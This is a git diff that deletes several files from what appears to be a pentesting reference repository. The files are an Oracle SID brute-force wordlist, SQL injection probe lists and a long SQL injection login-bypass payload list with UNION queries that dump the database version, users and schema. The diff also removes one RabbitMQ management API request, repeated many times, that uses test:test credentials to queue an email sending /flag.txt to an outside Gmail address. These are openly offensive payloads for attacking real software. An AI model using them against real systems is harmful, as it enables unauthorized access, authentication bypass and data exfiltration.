-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
-
diff --git a/src/images/reverse.tar.gz b/src/images/reverse.tar.gz
deleted file mode 100644
index 3d8a63206..000000000
Binary files a/src/images/reverse.tar.gz and /dev/null differ
diff --git a/src/images/sids-oracle.txt b/src/images/sids-oracle.txt
deleted file mode 100644
index ecf01d8c8..000000000
--- a/src/images/sids-oracle.txt
+++ /dev/null
@@ -1,737 +0,0 @@
-
-ADV1
-ADVCPROD
-AIX10
-AIX11
-AIX9
-APEX
-ARIS
-ASDB
-ASDB0
-ASDB1
-ASDB2
-ASDB3
-ASDB4
-ASDB5
-ASDB6
-ASDB7
-ASDB8
-ASDB9
-ASG817
-ASG817P
-ASG817T
-ATRPROD
-ATRTEST
-BLA
-BOOKS
-BUDGET
-C630
-CLRExtProc
-CTM4_0
-CTM4_1
-CTM4_6
-D
-D10
-D8
-D9
-DB
-DB01
-DB02
-DB03
-DB1
-DB2
-DB2EDU
-DB2PROD
-DB2TEST
-DB3
-DBA
-DBA1
-DBA2
-DBA3
-DBA4
-DBA5
-DBA6
-DBA7
-DBA8
-DBA9
-DBX
-DEMO
-DEV
-DEV0
-DEV01
-DEV1
-DEV2
-DEV3
-DEV4
-DEV5
-DEV6
-DEV7
-DEV8
-DEV9
-DEVEL
-DIA1
-DIA2
-DIS
-DWH
-DWHDB
-DWHPROD
-DWHTEST
-DWRHS
-EARTH
-ELCARO
-EMRS2
-EOF
-ERP
-ESOR
-FINDEC
-FINPROD
-FNDFS_HR1
-FNDFS_HR2
-FPRD
-GR01
-GR02
-GR03
-HCDMO
-HEDGEHOG
-HPUX10
-HPUX11
-HPUX9
-HR
-HR0
-HR1
-HR2
-HR3
-HR4
-HR5
-HR6
-HR7
-HR8
-HR9
-HRDMO
-hsagent
-HTMLDB
-IAGTS
-IASDB
-INCD
-ISD01
-ISD06
-ISP
-ISP01
-ISP1
-ISP2
-ISQ1
-ITS
-IXOS
-KRAUS
-KRONOS
-LDAP
-LIN10
-LIN11
-LIN9
-LINUX101
-LINUX1011
-LINUX1012
-LINUX1013
-LINUX1014
-LINUX1015
-LINUX102
-LINUX1021
-LINUX1022
-LINUX1023
-LINUX1024
-LINUX1025
-LINUX111
-LINUX11106
-LINUX11107
-LINUX112
-LINUX11201
-LINUX817
-LINUX8171
-LINUX8172
-LINUX8173
-LINUX8174
-LINUX901
-LINUX902
-LINUX9021
-LINUX9022
-LINUX9023
-LINUX9024
-LINUX9025
-LINUX9026
-LINUX9027
-LINUX9028
-LINUX92
-LINUX9208
-LUN
-MDTEST
-MSAM
-MV713
-MYDB
-NEDB
-NORTHWIND
-OAS
-OAS1
-OAS10
-OAS2
-OAS3
-OAS4
-OAS5
-OAS6
-OAS7
-OAS8
-OAS9
-ODB
-OEMREP
-OGDP
-OID
-OJS
-OMS
-ORA
-ORA1
-ORA10
-ORA101
-ORA10101
-ORA10101P
-ORA10101T
-ORA10102
-ORA10102P
-ORA10102T
-ORA10103
-ORA10103P
-ORA10103T
-ORA10104
-ORA10104P
-ORA10104T
-ORA10105
-ORA10105P
-ORA10105T
-ORA1011
-ORA1011P
-ORA1011T
-ORA1012
-ORA1012P
-ORA1012T
-ORA1013
-ORA1013P
-ORA1013T
-ORA1014
-ORA1014P
-ORA1014T
-ORA1015
-ORA1015P
-ORA1015T
-ORA1021
-ORA1021P
-ORA1021T
-ORA1022
-ORA1022P
-ORA1022T
-ORA1023
-ORA1023P
-ORA1023T
-ORA1024
-ORA1024P
-ORA1024T
-ORA1025
-ORA1025P
-ORA1025T
-ORA11
-ORA111
-ORA11106
-ORA11107
-ORA112
-ORA11201
-ORA11202
-ORA11g
-ORA2
-ORA3
-ORA4
-ORA5
-ORA6
-ORA7
-ORA8
-ORA805
-ORA806
-ORA815
-ORA816
-ORA817
-ORA8170
-ORA8170P
-ORA8170T
-ORA8171
-ORA8171P
-ORA8171T
-ORA8172
-ORA8172P
-ORA8172T
-ORA8173
-ORA8173P
-ORA8173T
-ORA8174
-ORA8174P
-ORA8174T
-ORA8_SC
-ORA9
-ORA910
-ORA920
-ORA9201
-ORA9201P
-ORA9201T
-ORA9202
-ORA9202P
-ORA9202T
-ORA9203
-ORA9203P
-ORA9203T
-ORA9204
-ORA9204P
-ORA9204T
-ORA9205
-ORA9205P
-ORA9205T
-ORA9206
-ORA9206P
-ORA9206T
-ORA9207
-ORA9207P
-ORA9207T
-ORA9208
-ORA9208P
-ORA9208T
-ORACL
-ORACLE
-ORADB
-ORADB1
-ORADB2
-ORADB3
-ORALIN
-ORCL
-ORCL0
-ORCL1
-ORCL10
-ORCL10G
-ORCL11
-ORCL11G
-ORCL2
-ORCL3
-ORCL4
-ORCL5
-ORCL6
-ORCL7
-ORCL8
-ORCL9
-ORCLA
-ORCLB
-ORCLC
-ORCLD
-ORCLE
-ORCLF
-ORCLG
-ORCLH
-ORCLI
-ORCLJ
-ORCLK
-ORCLL
-ORCLM
-ORCLN
-ORCLO
-ORCLP
-ORCLP0
-ORCLP1
-ORCLP2
-ORCLP3
-ORCLP4
-ORCLP5
-ORCLP6
-ORCLP7
-ORCLP8
-ORCLP9
-ORCLQ
-ORCLR
-ORCLS
-ORCLSOL
-ORCLT
-ORCLU
-ORCLV
-ORCLW
-ORCL.WORLD
-ORCLX
-ORCLY
-ORCLZ
-ORIONDB
-ORTD
-P
-P10
-P10G
-P8
-P8I
-P9
-P9I
-PD1
-PINDB
-PLSExtProc
-PORA10101
-PORA10102
-PORA10103
-PORA10104
-PORA10105
-PORA1011
-PORA1012
-PORA1013
-PORA1014
-PORA1015
-PORA1021
-PORA1022
-PORA1023
-PORA1024
-PORA1025
-PORA11106
-PORA11107
-PORA11201
-PORA11202
-PORA8170
-PORA8171
-PORA8172
-PORA8173
-PORA8174
-PORA9201
-PORA9202
-PORA9203
-PORA9204
-PORA9205
-PORA9206
-PORA9207
-PORA9208
-PRD
-PRITXI
-PROD
-PROD0
-PROD1
-PROD10
-PROD10G
-PROD11
-PROD11G
-PROD2
-PROD3
-PROD4
-PROD5
-PROD6
-PROD7
-PROD8
-PROD8I
-PROD9
-PROD920
-PROD9I
-PROG10
-QM
-QS
-RAB1
-RAC
-RAC1
-RAC2
-RAC3
-RAC4
-RDB
-RDS
-RECV
-REP
-REP0
-REP1
-REP2
-REP3
-REP4
-REP5
-REP6
-REP7
-REP8
-REP9
-REPO
-REPO0
-REPO1
-REPO2
-REPO3
-REPO4
-REPO5
-REPO6
-REPO7
-REPO8
-REPO9
-REPOS
-REPOS0
-REPOS1
-REPOS2
-REPOS3
-REPOS4
-REPOS5
-REPOS6
-REPOS7
-REPOS8
-REPOS9
-REPSCAN
-RIPPROD
-RITCTL
-RITDEV
-RITPROD
-RITQA
-RITTRN
-RITTST
-SA0
-SA1
-SA2
-SA3
-SA4
-SA5
-SA6
-SA7
-SA8
-SA9
-SAA
-SAB
-SAC
-SAD
-SAE
-SAF
-SAG
-SAH
-SAI
-SAJ
-SAK
-SAL
-SALES
-SAM
-SAMPLE
-SAN
-SANIPSP
-SAO
-SAP
-SAP0
-SAP1
-SAP2
-SAP3
-SAP4
-SAP5
-SAP6
-SAP7
-SAP8
-SAP9
-SAPHR
-SAQ
-SAR
-SAS
-SAT
-SAU
-SAV
-SAW
-SAX
-SAY
-SAZ
-SDB
-SENTRIGO
-SES
-SGNT
-SID0
-SID1
-SID2
-SID3
-SID4
-SID5
-SID6
-SID7
-SID8
-SID9
-SIP
-SOL10
-SOL11
-SOL9
-STAG1
-STAG2
-T1
-T10
-T101
-T102
-T2
-T3
-T4
-T7
-T71
-T72
-T73
-T8
-T80
-T81
-T82
-T9
-T91
-T92
-TEST
-TEST10G
-TEST11G
-TEST9I
-TESTORCL
-THUMPER
-TRC28
-TRIUMF
-TSH1
-TSM
-TST
-TST0
-TST1
-TST2
-TST3
-TST4
-TST5
-TST6
-TST7
-TST8
-TST9
-TYCP
-UNIX101
-UNIX1011
-UNIX1012
-UNIX1013
-UNIX1014
-UNIX1015
-UNIX102
-UNIX1021
-UNIX1022
-UNIX1023
-UNIX1024
-UNIX1025
-UNIX817
-UNIX8171
-UNIX8172
-UNIX8173
-UNIX8174
-UNIX901
-UNIX902
-UNIX9021
-UNIX9022
-UNIX9023
-UNIX9024
-UNIX9025
-UNIX9026
-UNIX9027
-UNIX9028
-V713
-VENOM
-VENU
-VISTA
-W101
-W1011
-W1012
-W1013
-W1014
-W1015
-W102
-W1021
-W1022
-W1023
-W1024
-W1025
-W111
-W11102
-W11106
-W11107
-W112
-W11201
-W817
-W8171
-W8172
-W8173
-W8174
-W901
-W902
-W9021
-W9022
-W9023
-W9024
-W9025
-W9026
-W9027
-W9028
-WEB
-WEB1
-WEB10
-WEB2
-WEB3
-WEB4
-WEB5
-WEB6
-WEB7
-WEB8
-WEB9
-WEBDEV
-WG73
-WG73
-WIN101
-WIN1011
-WIN1012
-WIN1013
-WIN1014
-WIN1015
-WIN102
-WIN1021
-WIN1022
-WIN1023
-WIN1024
-WIN1025
-WIN11
-WIN111
-WIN11106
-WIN11107
-WIN112
-WIN11201
-WIN11202
-WIN7
-WIN817
-WIN8171
-WIN8172
-WIN8173
-WIN8174
-WIN901
-WIN902
-WIN9021
-WIN9022
-WIN9023
-WIN9024
-WIN9025
-WIN9026
-WIN9027
-WIN9028
-WINDOWS101
-WINDOWS1011
-WINDOWS1012
-WINDOWS1013
-WINDOWS1014
-WINDOWS1015
-WINDOWS102
-WINDOWS1021
-WINDOWS1022
-WINDOWS1023
-WINDOWS1024
-WINDOWS1025
-WINDOWS11
-WINDOWS111
-WINDOWS11106
-WINDOWS11107
-WINDOWS112
-WINDOWS11201
-WINDOWS11202
-WINDOWS817
-WINDOWS8171
-WINDOWS8172
-WINDOWS8173
-WINDOWS8174
-WINDOWS901
-WINDOWS902
-WINDOWS9021
-WINDOWS9022
-WINDOWS9023
-WINDOWS9024
-WINDOWS9025
-WINDOWS9026
-WINDOWS9027
-WINDOWS9028
-XE
-XEXDB
-XE_XPT
diff --git a/src/images/sqli-1.txt b/src/images/sqli-1.txt
deleted file mode 100644
index 3952738e2..000000000
--- a/src/images/sqli-1.txt
+++ /dev/null
@@ -1,49 +0,0 @@
-true
-1
-1>0
-2-1
-0+1
-1*1
-1%2
-1=1
-1 & 1
-1&1
-1 && 2
-1&&2
--1 || 1
-|1||1
--1 oR 1
-1 aND 1
-1 LikE 1
-(1)oR(1)
-(1)aND(1)
-(1)LikE(1)
--1/**/oR/**/1
-1/**/aND/**/1
-1/**/LikE/**/1
-1'
-1'>'0
-2'-'1
-0'+'1
-1'*'1
-1'%'2
-1'='1
-1'&'1
-1'&&'2
--1'||'1
--1'oR'1
-1'aND'1
-1'LikE'1
-1"
-1">"0
-2"-"1
-0"+"1
-1"*"1
-1"%"2
-1"="1
-1"&"1
-1"&&"2
--1"||"1
--1"oR"1
-1"aND"1
-1"LikE"1
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
